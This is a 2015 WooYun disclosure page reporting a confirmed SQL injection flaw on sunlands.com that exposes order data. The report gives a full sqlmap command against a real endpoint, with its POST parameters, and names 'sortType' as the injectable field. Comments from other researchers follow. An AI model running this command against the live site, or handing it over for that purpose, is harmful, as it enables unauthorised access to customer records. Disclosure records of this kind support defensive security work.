尚德机构网站注入漏洞泄露大量订单信息

漏洞概要

缺陷编号:WooYun-2015-0125522

漏洞标题:尚德机构网站注入漏洞泄露大量订单信息

相关厂商:sunlands.com

漏洞作者:covertops

提交时间:2015-07-09 00:05

公开时间:2015-08-24 15:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

Tags标签:

漏洞详情

披露状态:

2015-07-09: 细节已通知厂商并且等待厂商处理中
2015-07-10: 厂商已经确认,细节仅向厂商公开
2015-07-20: 细节向核心白帽子及相关领域专家公开
2015-07-30: 细节向普通白帽子公开
2015-08-09: 细节向实习白帽子公开
2015-08-24: 细节向公众公开

简要描述:

学习是种心痒

详细说明:

尚德官网存在注入:pythonsqlmap.py -u "http://www.sunlands.com/category/ajaxWebCategory.htm" --data="page.pageIndex=1&parentId=1&schoolId=35&sortType=1"sortType存在注入

涉及大量数据:

漏洞证明:

如上

修复方案:

过滤,学习是种心痒

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-07-1015:00

厂商回复:

SQL注入漏洞,请延长公布时间,将尽快修复

最新状态:

暂无

评价

  1. 2010-01-01 00:00 雷锋 白帽子 | Rank:8 漏洞数:1)

    我在这报的学历。。。。

  2. 2010-01-01 00:00 天地不仁 以万物为刍狗 白帽子 | Rank:467 漏洞数:54)

    学习是种心痒????楼主 心痒痒了?

  3. 2010-01-01 00:00 园长 白帽子 | Rank:124 漏洞数:14)

    RRRRRR曾经是这公司的二手程序员...

  4. 2010-01-01 00:00 大亮 白帽子 | Rank:267 漏洞数:28)

    看以前漏洞,感觉这个会被忽略

  5. 2010-01-01 00:00 M4sk 白帽子 | Rank:783 漏洞数:96)

    天天打骚扰电话给我 我说了不报名了 你还打! 我真是日了动物园了~╮(╯▽╰)╭

  6. 2010-01-01 00:00 covertops 白帽子 | Rank:64 漏洞数:8)

    @M4sk 是不是注册了个号,然后测他们网站了,我俩手机练练越权,现在时不时短信电话